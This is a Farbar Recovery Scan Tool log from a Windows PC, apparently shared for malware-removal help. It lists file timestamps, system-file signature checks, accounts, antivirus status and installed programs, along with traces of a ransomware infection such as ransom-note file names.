2015-07-16 08:41 - 2014-12-19 04:25 - 00602776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00535640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00531616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00448792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00413248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00372408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00108944 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDump.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00038264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2015-07-16 08:41 - 2014-12-08 15:42 - 00033584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2015-07-16 08:41 - 2014-10-30 18:37 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2015-07-16 08:41 - 2014-10-30 18:34 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2015-07-16 08:40 - 2015-05-02 20:39 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2015-07-16 08:38 - 2015-05-07 11:21 - 00522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\GeofenceMonitorService.dll
2015-07-16 08:38 - 2015-05-07 11:05 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GeofenceMonitorService.dll
2015-07-16 08:38 - 2015-04-09 20:34 - 02256896 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2015-07-16 08:38 - 2015-04-09 20:11 - 01943040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2015-07-15 16:18 - 2015-02-20 19:49 - 00780800 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll
2015-07-15 16:16 - 2015-04-24 22:25 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usb8023.sys
2015-07-15 14:11 - 2015-03-13 00:03 - 00239424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2015-07-15 14:11 - 2015-03-13 00:03 - 00154432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2015-07-15 11:02 - 2015-04-30 16:35 - 00124112 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2015-07-15 11:02 - 2015-04-30 16:35 - 00102608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-07-14 08:21 - 2015-07-20 08:35 - 00000000 ___HD C:\7afd7914
2015-07-13 15:36 - 2015-07-13 15:36 - 00002233 _____ C:\Users\Richie\Desktop\HP Support Assistant.lnk
2015-07-13 15:33 - 2015-07-13 15:33 - 00000000 ____D C:\ProgramData\{18165758-115C-4DC0-9EC2-FF89F725767F}
2015-07-10 18:12 - 2015-07-12 01:16 - 00000000 ___DC C:\WINDOWS\Panther
2015-07-10 18:12 - 2015-07-10 18:12 - 00000000 __SHD C:\Recovery
2015-07-10 18:08 - 2015-07-10 18:08 - 00262144 _____ C:\WINDOWS\system32\config\userdiff
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files\Reference Assemblies
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files\MSBuild
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files (x86)\MSBuild
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\inetpub
2015-07-10 18:03 - 2013-08-03 00:48 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2015-07-10 18:03 - 2013-08-03 00:41 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2015-07-10 15:59 - 2015-07-20 08:44 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieBrowserModeList
2015-07-10 15:59 - 2015-07-20 08:43 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieUserList
2015-07-10 15:59 - 2015-07-20 08:43 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieSiteList
2015-07-10 15:39 - 2015-07-28 16:08 - 00000000 ___RD C:\Users\Richie\OneDrive
2015-07-10 15:34 - 2015-07-28 13:17 - 00000000 ____D C:\Users\Richie\AppData\Local\{beedd195-7534-c93e-bcaf-0a2671d4725d}
2015-07-10 15:34 - 2015-07-10 15:34 - 00000000 ___HD C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}
2015-07-10 15:30 - 2015-07-10 15:30 - 00001442 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-07-10 15:28 - 2015-07-10 15:28 - 00000020 ___SH C:\Users\Richie\ntuser.ini
2015-07-10 15:20 - 2015-07-28 16:34 - 01701369 _____ C:\WINDOWS\WindowsUpdate.log
2015-07-10 15:19 - 2015-07-10 15:19 - 00022744 _____ C:\WINDOWS\system32\emptyregdb.dat
2015-07-10 14:53 - 2015-07-10 14:53 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-07-10 14:53 - 2015-07-10 14:53 - 00000000 ____D C:\Users\Default\Documents\hp.system.package.metadata
2015-07-10 14:53 - 2015-07-10 14:53 - 00000000 ____D C:\Users\Default User\Documents\hp.system.package.metadata
2015-07-10 14:46 - 2015-07-10 14:46 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2015-07-10 14:35 - 2015-07-27 20:13 - 00000000 ____D C:\Users\Richie
2015-07-10 14:35 - 2015-07-10 14:45 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-10 14:35 - 2014-11-21 11:57 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-10 14:35 - 2014-11-21 11:57 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2015-07-10 14:35 - 2014-11-21 04:52 - 00000369 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2015-07-10 14:35 - 2014-11-21 04:52 - 00000369 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2015-07-10 14:35 - 2013-08-22 11:36 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-07-10 14:34 - 2015-07-10 15:20 - 00020958 _____ C:\WINDOWS\diagwrn.xml
2015-07-10 14:34 - 2015-07-10 15:20 - 00020958 _____ C:\WINDOWS\diagerr.xml
2015-07-10 14:21 - 2015-07-10 14:45 - 00012096 _____ C:\WINDOWS\iis.log
2015-07-10 14:21 - 2015-07-10 14:21 - 00930400 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2015-07-10 14:16 - 2015-07-10 14:16 - 00000264 _____ C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\Program Files\Realtek
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 _____ C:\WINDOWS\ativpsrm.bin
2015-07-10 14:15 - 2015-07-10 14:15 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01009.Wdf
2015-07-10 14:15 - 2015-07-10 14:15 - 00000000 ____D C:\Program Files\Synaptics
2015-07-10 12:07 - 2015-07-10 15:20 - 00006605 _____ C:\WINDOWS\comsetup.log
2015-07-08 08:00 - 2015-07-12 01:09 - 00000000 ____D C:\WINDOWS\system32\AutoUpdateLicense
2015-07-06 09:21 - 2015-03-04 03:26 - 00011105 ____N C:\WINDOWS\system32\AutoconfigV2.cab
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-07-28 16:32 - 2012-07-26 03:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-07-28 16:16 - 2013-06-06 22:42 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2321640021-2341620851-140482586-1002
2015-07-28 16:13 - 2014-11-21 04:44 - 00956476 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-07-28 16:05 - 2013-08-22 10:46 - 00298411 _____ C:\WINDOWS\setupact.log
2015-07-28 16:05 - 2013-08-22 10:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-07-28 16:04 - 2014-11-21 04:34 - 00868726 _____ C:\WINDOWS\PFRO.log
2015-07-28 16:03 - 2013-08-22 09:25 - 00786432 ___SH C:\WINDOWS\system32\config\BBI
2015-07-28 16:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sru
2015-07-28 13:20 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\vpnplugins
2015-07-28 13:17 - 2014-12-06 22:56 - 00000000 ____D C:\ProgramData\LeboBukmo
2015-07-28 13:17 - 2014-11-26 00:56 - 00000000 ____D C:\Users\Richie\AppData\Roaming\FrameworkUpdate
2015-07-28 13:17 - 2014-11-21 00:32 - 00000000 ____D C:\ProgramData\IomuTdilf
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\Users\Richie\AppData\Roaming\FrameworkUpdate7
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\ProgramData\XesviPteyu
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\ProgramData\IojdOnyo
2015-07-28 13:17 - 2014-11-09 01:59 - 00000000 ____D C:\ProgramData\XiboHbik
2015-07-28 13:17 - 2014-11-09 01:59 - 00000000 ____D C:\ProgramData\EoxoKazxa
2015-07-28 13:17 - 2014-11-07 20:16 - 00000000 ____D C:\ProgramData\RogoLatk
2015-07-28 13:17 - 2014-11-07 20:15 - 00000000 ____D C:\ProgramData\BoweCpeb
2015-07-28 13:17 - 2013-06-06 20:08 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Adobe
2015-07-28 12:02 - 2013-09-27 22:11 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-07-28 11:48 - 2013-06-06 20:08 - 00003922 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{3DBD3851-149E-4BFD-A49D-F9E67AA1E10F}
2015-07-28 11:47 - 2014-11-05 01:20 - 00000000 ____D C:\ProgramData\HezagTonag
2015-07-27 20:17 - 2013-08-22 10:44 - 00337808 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-07-27 19:02 - 2013-04-23 03:51 - 00000000 ____D C:\ProgramData\Norton
2015-07-27 18:55 - 2013-08-22 09:25 - 00262144 ___SH C:\WINDOWS\system32\config\ELAM
2015-07-27 18:55 - 2012-07-26 04:12 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2015-07-25 09:24 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-07-25 09:18 - 2013-06-06 20:03 - 00000000 ____D C:\Users\Richie\AppData\Local\Packages
2015-07-21 16:58 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\rescache
2015-07-20 08:44 - 2015-01-29 00:30 - 00020480 ___SH C:\Users\Richie\Desktop\Thumbs.db
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ___RD C:\WINDOWS\ToastData
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\WinStore
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-RS
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-CS
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files\Windows Defender
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2015-07-20 08:00 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2015-07-18 11:03 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2015-07-18 08:25 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\AppCompat
2015-07-17 10:52 - 2014-11-21 04:25 - 00000000 ____D C:\Program Files\Windows Journal
2015-07-17 09:50 - 2013-04-23 02:57 - 00000000 ____D C:\Program Files (x86)\ATI Technologies
2015-07-17 08:53 - 2014-11-21 11:56 - 00000000 ___SD C:\WINDOWS\system32\CompatTel
2015-07-13 17:10 - 2014-11-21 12:03 - 00792568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2015-07-13 17:10 - 2014-11-21 12:03 - 00178168 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2015-07-13 15:37 - 2014-07-06 22:58 - 00000350 _____ C:\WINDOWS\Tasks\HPCeeScheduleForRichie.job
2015-07-13 15:36 - 2012-08-17 14:28 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2015-07-13 15:36 - 2012-08-17 14:28 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-07-13 15:34 - 2012-08-17 14:00 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2015-07-13 15:30 - 2012-08-17 14:26 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-07-13 15:29 - 2012-08-17 14:28 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
2015-07-13 15:25 - 2012-08-03 20:02 - 00000000 ____D C:\SWSetup
2015-07-10 18:09 - 2013-08-22 11:36 - 00262144 _____ C:\WINDOWS\system32\config\BCD-Template
2015-07-10 18:05 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2015-07-10 18:05 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2015-07-10 18:04 - 2014-11-21 05:16 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2015-07-10 18:04 - 2014-11-21 05:16 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe
2015-07-10 18:04 - 2014-11-21 05:16 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll
2015-07-10 15:20 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\Registration
2015-07-10 15:15 - 2013-08-22 11:36 - 00000000 __RSD C:\WINDOWS\Media
2015-07-10 15:15 - 2013-08-22 11:36 - 00000000 __RHD C:\Users\Public\Libraries
2015-07-10 14:54 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2015-07-10 14:54 - 2013-04-23 03:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Communication and Chat
2015-07-10 14:54 - 2013-04-23 03:28 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink LabelPrint
2015-07-10 14:54 - 2013-04-23 03:23 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2015-07-10 14:54 - 2012-08-17 14:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-07-10 14:54 - 2012-08-17 14:13 - 00000000 ____D C:\WINDOWS\en
2015-07-10 14:54 - 2012-08-17 14:12 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live
2015-07-10 14:53 - 2013-08-22 11:37 - 00005217 _____ C:\WINDOWS\DtcInstall.log
2015-07-10 14:53 - 2012-07-26 01:37 - 00000000 ____D C:\Users\Default.migrated
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\SysWOW64\WCN
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\system32\WCN
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\migwiz
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\IME
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\spool
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\MUI
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\IME
2015-07-10 14:52 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\SysWOW64\SMI
2015-07-10 14:52 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\oobe
2015-07-10 14:52 - 2013-04-23 03:06 - 00000000 ____D C:\WINDOWS\SysWOW64\sda
2015-07-10 14:52 - 2012-08-17 14:07 - 00000000 ____D C:\WINDOWS\SysWOW64\Adobe
2015-07-10 14:50 - 2013-08-22 11:43 - 00000000 ____D C:\WINDOWS\DigitalLocker
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 __SHD C:\Program Files\Windows Sidebar
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\Help
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2015-07-10 14:50 - 2013-06-06 20:07 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shopping and Services
2015-07-10 14:50 - 2012-08-17 14:05 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Security and Protection
2015-07-10 14:50 - 2012-08-03 18:29 - 00000000 ____D C:\ProgramData\PRICache
2015-07-10 14:46 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\Recovery
2015-07-10 14:14 - 2013-08-22 09:36 - 00000000 __RHD C:\Users\Default
2015-07-10 13:48 - 2013-06-06 20:03 - 02013866 _____ C:\WINDOWS\WindowsUpdate (1).log
2015-07-10 10:22 - 2012-07-26 04:12 - 00000000 ____D C:\WINDOWS\AUInstallAgent
2015-07-08 07:59 - 2014-12-13 10:58 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Ecidcuo
2015-07-08 07:59 - 2014-12-06 22:58 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Evcoguyl
2015-07-08 07:59 - 2014-11-21 00:33 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Urablax
2015-07-06 16:41 - 2015-06-21 01:14 - 00000000 ____D C:\Users\Public\Downloads\Norton
2015-07-03 08:43 - 2013-07-17 21:58 - 130333168 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
 
==================== Files in the root of some directories =======
 
2015-07-17 10:59 - 2015-07-17 10:59 - 0266240 _____ () C:\Users\Richie\AppData\Roaming\7afd7914.dll
2014-11-11 19:33 - 2014-11-11 19:33 - 0008516 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-11-11 19:33 - 2014-11-11 19:33 - 0004198 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-11-11 19:33 - 2014-11-11 19:33 - 0000268 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2015-01-29 00:25 - 2015-01-29 00:25 - 0008528 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.HTML
2015-01-29 00:25 - 2015-01-29 00:25 - 0045533 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.PNG
2015-01-29 00:25 - 2015-01-29 00:25 - 0004204 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.TXT
2015-01-29 00:25 - 2015-01-29 00:25 - 0000272 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.URL
2014-11-11 19:24 - 2014-11-11 19:24 - 0000448 ____H () C:\Users\Richie\AppData\Roaming\麽鎒駓覜
2014-11-11 19:33 - 2014-11-11 19:33 - 0008516 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-11-11 19:33 - 2014-11-11 19:33 - 0004198 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-11-11 19:33 - 2014-11-11 19:33 - 0000268 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.URL
2015-01-29 00:24 - 2015-01-29 00:24 - 0008528 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.HTML
2015-01-29 00:24 - 2015-01-29 00:24 - 0045533 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.PNG
2015-01-29 00:24 - 2015-01-29 00:24 - 0004204 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.TXT
2015-01-29 00:24 - 2015-01-29 00:24 - 0000272 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.URL
2014-11-11 19:24 - 2015-01-28 23:26 - 0000664 _____ () C:\ProgramData\@system.temp
2014-11-11 19:25 - 2015-01-28 23:27 - 0000400 ____H () C:\ProgramData\@system3.att
 
Some files in TEMP:
====================
C:\Users\Richie\AppData\Local\Temp\avgnt.exe
C:\Users\Richie\AppData\Local\Temp\sp64126.exe
C:\Users\Richie\AppData\Local\Temp\UninstallHPSA.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-07-28 16:17
 
==================== End of log ============================
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:26-07-2015
Ran by Richie at 2015-07-28 16:37:53
Running from C:\Users\Richie\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-2321640021-2341620851-140482586-500 - Administrator - Disabled)
Guest (S-1-5-21-2321640021-2341620851-140482586-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2321640021-2341620851-140482586-1004 - Limited - Enabled)
Richie (S-1-5-21-2321640021-2341620851-140482586-1002 - Administrator - Enabled) => C:\Users\Richie
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avira Antivirus (Enabled - Out of date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Out of date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4 Elements II (x32 Version: 2.2.0.98 - WildTangent) Hidden
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.5.635 - Adobe Systems, Inc.)
AMD Catalyst Install Manager (HKLM\...\{63ADEC24-A374-80A8-E89B-BE401C787F75}) (Version: 8.0.881.0 - Advanced Micro Devices, Inc.)
AMD VISION Engine Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
Avira (HKLM-x32\...\{8467e01f-0496-42ce-b247-88ef205b4880}) (Version: 1.1.40.29239 - Avira Operations GmbH & Co. KG)
Avira (x32 Version: 1.1.40.29239 - Avira Operations GmbH & Co. KG) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.12.408 - Avira Operations GmbH & Co. KG)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Build-a-lot 4 - Power Source (x32 Version: 2.2.0.98 - WildTangent) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1.5407 - CyberLink Corp.)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.1.1916 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.1.1926 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
FATE: The Cursed King (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
FlatOut 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 44.0.2403.107 - Google Inc.)
Google Update Helper (x32 Version: 1.3.28.1 - Google Inc.) Hidden
Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP Documentation (HKLM-x32\...\{AE986BF5-B6E3-4F8D-B412-A3DD90DF5146}) (Version: 1.1.1.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.3.0 - WildTangent)
